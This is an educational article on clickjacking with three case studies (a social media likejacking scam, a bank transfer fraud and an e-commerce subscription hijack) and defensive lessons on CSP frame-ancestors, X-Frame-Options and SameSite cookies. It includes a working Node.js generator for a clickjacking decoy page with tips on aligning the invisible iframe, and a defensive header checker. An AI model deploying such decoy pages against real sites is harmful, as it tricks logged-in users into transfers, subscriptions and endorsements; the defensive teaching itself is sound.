
Hidden Clicks, Real Damage: Clickjacking Case Studies

Case Study 1: Social Media LikeJacking Scam

Background

A popular social media platform saw a sudden increase in suspicious “Likes” on random pages. Users complained that they never clicked “Like,” yet their profile was promoting unknown pages.

What Happened

Attackers set up a website offering “Watch Free Movies.”
A big orange Play button was all that visitors could see.
On top of that button the attackers layered an invisible iframe (opacity 0, higher z-index than the button) that loaded the real Facebook Like button for their spam page, positioned so the Like button sat exactly under the Play button.

When users clicked Play, the click went to the invisible frame, not the button, and because they were logged in to Facebook in the same browser the Like was recorded under their own account.
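The page layout behind this and the two later case studies, written as an added example for a lab setup and not code from the original post or from any of the sites involved: a Node.js script that produces the attacker's decoy page. The target URL, decoy text and pixel positions are placeholder assumptions.

```javascript
'use strict';

// Constructed placeholder values: the target URL and button positions are
// assumptions for a lab setup, not taken from any site in the case studies.
const DEFAULT_POC = {
  targetUrl: 'https://target.example/subscribe', // framed page with the real button
  decoyText: 'Play',
  decoyPos: { x: 100, y: 100 },  // where the visible decoy button is drawn
  targetPos: { x: 320, y: 240 }, // where the real button sits inside the framed page
};

function escapeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;');
}

// The framed document is shifted by (decoy - target) so that the real button
// is rendered exactly under the decoy; negative offsets are the normal case.
function frameOffset(decoyPos, targetPos) {
  return { left: decoyPos.x - targetPos.x, top: decoyPos.y - targetPos.y };
}

// Builds the attacker's page. Three CSS properties do all the work:
//   - position/left/top on the iframe align the real button with the decoy,
//   - opacity: 0 hides the framed page while it still receives pointer events,
//   - z-index puts the invisible frame ABOVE the decoy, so the click never
//     reaches the decoy at all; it goes to the framed page.
function buildClickjackPoc(opts = {}) {
  const { targetUrl, decoyText, decoyPos, targetPos } = { ...DEFAULT_POC, ...opts };
  const { left, top } = frameOffset(decoyPos, targetPos);
  return `<!doctype html>
<html><head><meta charset="utf-8"><style>
  body { margin: 0; }
  #decoy { position: absolute; left: ${decoyPos.x}px; top: ${decoyPos.y}px; z-index: 1;
           padding: 20px 40px; background: orange; font-size: 24px; }
  #victim { position: absolute; left: ${left}px; top: ${top}px;
            width: 1200px; height: 900px; border: 0;
            opacity: 0; z-index: 2; }  /* invisible, but on top */
</style></head><body>
  <button id="decoy">${escapeAttr(decoyText)}</button>
  <iframe id="victim" src="${escapeAttr(targetUrl)}"></iframe>
</body></html>`;
}
```

While aligning the frame against a test target, set the opacity to about 0.5 so both layers are visible, then drop it to 0 for the finished page. If the target sends a framing header (see the lessons below) the browser refuses to render the iframe at all and the click simply lands on the decoy button.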

Impact

  • Thousands of users unknowingly boosted fake pages

  • The spam pages gained followers quickly

  • Those pages later spread phishing and scam links

Lesson

Simple UI manipulation can trick even experienced users. The awkward part for a platform is that a Like or Share widget is built to be embedded on third-party pages, so it cannot simply refuse to be framed. It has to treat those one-click actions as low-trust (rate limits, and for example a confirmation step when the clicks look automated) and keep every action it does not intend to be embedded (follows, posts, settings) out of frames entirely with framing headers.

Case Study 2: Online Banking Clickjacking Fraud

Background

A regional bank noticed several customers reporting unauthorized fund transfers. Yet, no malware was found on their devices.

What Happened

Attackers sent phishing emails that led users to a fake “Account Verification” site.
The site showed an ordinary-looking Verify button.
Layered over it was an invisible iframe loading the bank’s real “Transfer Funds” page, which accepted a pre-filled amount and recipient, positioned so that its “Confirm Transfer” button sat exactly under the Verify button.

When users who were already logged in to online banking in that browser clicked “Verify,” the click landed on the hidden “Confirm Transfer” button, and the bank processed the transfer as a legitimate request carrying the victim’s own session cookie.

Impact

  • Money was transferred to attacker-controlled accounts

  • Victims believed it was a bank error

  • The bank had to reimburse customers and upgrade its security

Lesson

The bank’s pages should refuse to be framed by anyone: send Content-Security-Policy: frame-ancestors 'none' (the authoritative control in current browsers, and it must be an HTTP response header, not a <meta> tag) together with X-Frame-Options: DENY for older browsers. When both are present and the CSP carries a frame-ancestors directive, the CSP directive wins and X-Frame-Options is ignored. Two further controls limit the damage even if a page does get framed: marking the session cookie SameSite=Lax or Strict, so the browser does not send it when the page is loaded in a cross-site iframe, and requiring a confirmation for a transfer that cannot be satisfied by a single click, such as a one-time code.
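An added example, not from the original post: a small Node.js checker that applies the browser rules above to a set of response headers and reports whether a page can be framed from a given origin. It serves this lesson and the e-commerce one below. Header values, hostnames and the sample responses are constructed; no real site is involved.

```javascript
'use strict';

// Returns the frame-ancestors source list carried by a CSP header, or null if
// the header has no such directive. Content-Security-Policy-Report-Only is
// deliberately not consulted: it reports, it does not block.
function parseFrameAncestors(cspHeader) {
  if (!cspHeader) return null;
  for (const directive of cspHeader.split(';')) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length && tokens[0].toLowerCase() === 'frame-ancestors') return tokens.slice(1);
  }
  return null;
}

// Does one frame-ancestors source expression admit framerOrigin?
// Simplification: a host source written without a scheme is accepted for any
// scheme (the CSP spec only allows an http -> https upgrade).
function sourceMatches(expr, pageOrigin, framerOrigin) {
  const src = expr.toLowerCase();
  if (src === "'none'") return false;
  if (src === "'self'") return pageOrigin === framerOrigin;
  if (src === '*') return true;
  const framer = new URL(framerOrigin);
  if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return framer.protocol === src; // scheme source, e.g. https:
  const m = src.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:\/*]+)(?::(\d+|\*))?$/);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme && framer.protocol !== scheme + ':') return false;
  const hostOk = wildcard ? framer.hostname.endsWith('.' + host) : framer.hostname === host;
  if (!hostOk) return false;
  if (port && port !== '*') {
    const framerPort = framer.port || (framer.protocol === 'https:' ? '443' : '80');
    if (framerPort !== port) return false;
  }
  return true;
}

// Decides whether pageUrl, served with these headers, may be framed by a
// document at framerUrl. Rules, as current browsers apply them:
//   1. a CSP frame-ancestors directive is authoritative; X-Frame-Options is then ignored;
//   2. otherwise X-Frame-Options DENY / SAMEORIGIN is honoured;
//   3. any other X-Frame-Options value (including the obsolete ALLOW-FROM) is
//      unrecognised and gives no protection at all.
function canBeFramed(headers, pageUrl, framerUrl) {
  const h = {};
  for (const [name, value] of Object.entries(headers)) h[name.toLowerCase()] = value;
  const pageOrigin = new URL(pageUrl).origin;
  const framerOrigin = new URL(framerUrl).origin;

  const ancestors = parseFrameAncestors(h['content-security-policy']);
  if (ancestors) {
    const allowed = ancestors.some((src) => sourceMatches(src, pageOrigin, framerOrigin));
    return { framable: allowed, reason: `CSP frame-ancestors ${ancestors.join(' ') || "(empty list = 'none')"}` };
  }
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return { framable: false, reason: 'X-Frame-Options: DENY' };
  if (xfo === 'SAMEORIGIN') return { framable: pageOrigin === framerOrigin, reason: 'X-Frame-Options: SAMEORIGIN' };
  if (xfo) return { framable: true, reason: `X-Frame-Options "${xfo}" is not recognised; no protection` };
  return { framable: true, reason: 'no framing restriction at all' };
}

// Constructed sample responses (hostnames and headers are made up): the bank
// and shop as breached, the fixed versions, and a widget that must stay
// embeddable for partners but not for anyone else.
const SAMPLES = [
  { name: 'bank, as breached', page: 'https://bank.example/transfer', headers: {} },
  { name: 'bank, XFO only', page: 'https://bank.example/transfer', headers: { 'X-Frame-Options': 'DENY' } },
  { name: 'bank, obsolete ALLOW-FROM', page: 'https://bank.example/transfer',
    headers: { 'X-Frame-Options': 'ALLOW-FROM https://partner.example' } },
  { name: 'shop, CSP + XFO', page: 'https://shop.example/subscribe',
    headers: { 'Content-Security-Policy': "frame-ancestors 'none'", 'X-Frame-Options': 'DENY' } },
  { name: 'widget for partners only', page: 'https://social.example/like',
    headers: { 'Content-Security-Policy': "frame-ancestors 'self' https://*.partner.example", 'X-Frame-Options': 'DENY' } },
];

function auditSamples(framerUrl = 'https://evil.example/free-movies') {
  return SAMPLES.map((s) => ({ name: s.name, ...canBeFramed(s.headers, s.page, framerUrl) }));
}

console.table(auditSamples());
```

To check a real target, paste the headers from curl -sI into the headers object. Note that the checker only reads the Content-Security-Policy header because browsers honour frame-ancestors only there; a <meta http-equiv> copy in the page source is ignored and is not evidence of protection.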

Case Study 3: Ecommerce Subscription Hijack

Background

A major ecommerce store received customer complaints about being subscribed to paid monthly services without their consent.

What Happened

A discount coupon website placed an invisible iframe over a fake “Get 80% Off Coupon” button.
That iframe loaded the ecommerce site’s page containing the Subscribe button for a paid service, aligned so that the Subscribe button sat under the coupon button.

When visitors who were logged in to the store clicked the coupon button, the click landed on the hidden Subscribe button and the subscription went through under their own account.

Impact

  • Hundreds of users accidentally subscribed

  • Customers demanded refunds

  • The ecommerce site suffered reputation damage

Lesson

Pages that carry financial or subscription actions should never be framable from external domains. The same framing headers as in Case Study 2 close this attack: the browser refuses to render the page inside the attacker’s frame, so there is nothing for the misdirected click to land on. A subscription flow that needs a second, distinct step (a review page or an explicit confirmation) also cannot be completed with one click.


References for Case Study 1: Social Media LikeJacking Scam

  1. OWASP Foundation – Clickjacking & Likejacking Attacks
    https://owasp.org/www-community/attacks/Clickjacking

  2. Facebook Security Notes – Protection Against Likejacking
    https://www.facebook.com/security

  3. Kaspersky – Social Media Scams and Clickjacking Techniques
    https://www.kaspersky.com/resource-center/threats

References for Case Study 2: Online Banking Clickjacking Fraud

  1. PortSwigger Web Security Academy – Clickjacking and UI Redressing Attacks
    https://portswigger.net/web-security/clickjacking

  2. CISA – Banking and Financial Sector Cybersecurity Threats
    https://www.cisa.gov/news-events

  3. Imperva – How Clickjacking Is Used in Financial Fraud
    https://www.imperva.com/learn/application-security/clickjacking/

References for Case Study 3: Ecommerce Subscription Hijack

  1. OWASP – Clickjacking Defense Cheat Sheet
    https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html

  2. Venafi Security Blog – How Clickjacking Impacts Online Stores
    https://www.venafi.com/blog

  3. Norton Security – Online Shopping Risks and Hidden UI Attacks
    https://us.norton.com/internetsecurity
